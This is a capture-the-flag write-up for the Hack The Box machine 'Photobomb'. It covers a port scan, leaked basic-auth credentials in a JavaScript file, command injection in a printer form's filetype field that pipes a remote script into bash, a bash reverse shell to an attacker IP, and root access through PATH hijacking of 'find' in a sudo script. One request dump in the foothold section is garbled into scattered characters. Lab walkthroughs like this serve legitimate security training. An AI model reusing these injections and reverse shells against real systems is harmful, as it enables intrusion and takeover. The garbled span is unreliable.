Enumeration

Port Scan

# Nmap 7.92 scan initiated Sun Oct 16 22:14:47 2022 as: nmap -sC -sV -sS -vvv -oN nmap.txt photobomb.htb
Nmap scan report for photobomb.htb (10.129.228.60)
Host is up, received echo-reply ttl 63 (0.20s latency).
Scanned at 2022-10-16 22:14:48 IST for 50s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6+RJ9JSdH4fFJPibAIpAZXAl7vCJA+98jmlaLCsANWQXth3UsQ+TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow+OUdXlmoxw+n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t+kpLAcsES6+yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60=
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
|   256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Photobomb
|_http-favicon: Unknown favicon MD5: 622B9ED3F0195B2D1811DF6F278518C2
| http-methods:
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 16 22:15:38 2022 -- 1 IP address (1 host up) scanned in 50.88 seconds

Website Enumeration

Untitled

<!DOCTYPE html>
<html>
<head>
  <title>Photobomb</title>
  <link type="text/css" rel="stylesheet" href="styles.css" media="all" />
  <script src="photobomb.js"></script>
</head>
<body>
  <div id="container">
    <header>
      <h1><a href="/">Photobomb</a></h1>
    </header>
    <article>
      <h2>Welcome to your new Photobomb franchise!</h2>
      <p>You will soon be making an amazing income selling premium photographic gifts.</p>
      <p>This state of-the-art web application is your gateway to this fantastic new life. Your wish is its command.</p>
      <p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
      <p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
    </article>
  </div>
</body>
</html>

There is something as photobomb.js included in the html file of the home page. And we found a endpoint /printer .

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:[email protected]/printer');
  }
}
window.onload = init;

We now have the credentials for the basic auth. pH0t0:b0Mb!

Untitled

We have feature to download images. Let’s explore the request in burp suite.

Foothold

P H U A A A C C O A C R U p O o s c c c o o r u o e p h S s e c c c n n i t n f g o T t r e e e t t g h n e r t : - p p p e e i o e r a o / A t t t n n n r c e d = p p g : - - t t : i t r e v r h e L E - - z i : - o i o n t a n T L h a o I i n t t e n c y e t t n h n c t o : x g o p n t i : t s u e b t u d e g p o t e - r o M a i : t : n c p c a m h g n h / : l : u p H b z t e g a : / o / r o T . i m : : p p B s / e s T h l l p 1 h a e p - t P t l , e g l 2 o s h R o / b a a n z i 0 t i o e l 1 / p - i c o c t q - . 5 p U p a b o u M 1 . l S , t o c b e W 0 i , i m E o s E c e d o b g m t R ( a n e n . w b s 4 X t ; f / h d . : 9 1 i q l x t D h Y 1 o = a - b A t 1 a ; n 0 t w 6 b D / . e w Y / - L x 5 w j p M i h - B r - n t f N i u u m o Y n n x l r i t s + m E e p x x - = r l 8 m u a 6 l r s _ , l h 6 a e . 4 p n j ; p c p l o g r i d & v c e f : a d i 1 t l 0 i e 2 o t . n y 0 / p ) x e m = G l p e ; n c q g k = ; o 0 p / . i 2 9 n 0 , g 1 i + 0 m - 0 a n 1 g + 0 e 1 1 / 0 a + F v 1 i i 0 r f . e , 1 f i 0 o m . x a 1 / g 6 1 e . 0 / 9 2 w ; . e & 0 b d p i , m * e / n * s ; i q o = n 0 s . = 8 3 0 0 0 x 2 0 0 0

Along with tcpdump - sudo tcpdump -i tun0 am able to confirm that I’m able to ping myself from that remote host.

Let’s use the following payload generated using revshell.com.

/bin/bash -i >& /dev/tcp/10.10.16.9/4444 0>&1

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;curl+http%3a//10.10.16.9/shell.sh+|+bash;&dimensions=3000x2000

This command gives us shell.

Local Privilege Escalation

Untitled

This is the content of cleanup.sh

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

We see path for find isn’t mentioned. There for with path hijacking we can obtain privilege escalation.

cd /tmp
touch find
echo "/bin/bash -p" > find
chmod +x find
sudo PATH=/tmp:$PATH /opt/cleanup.sh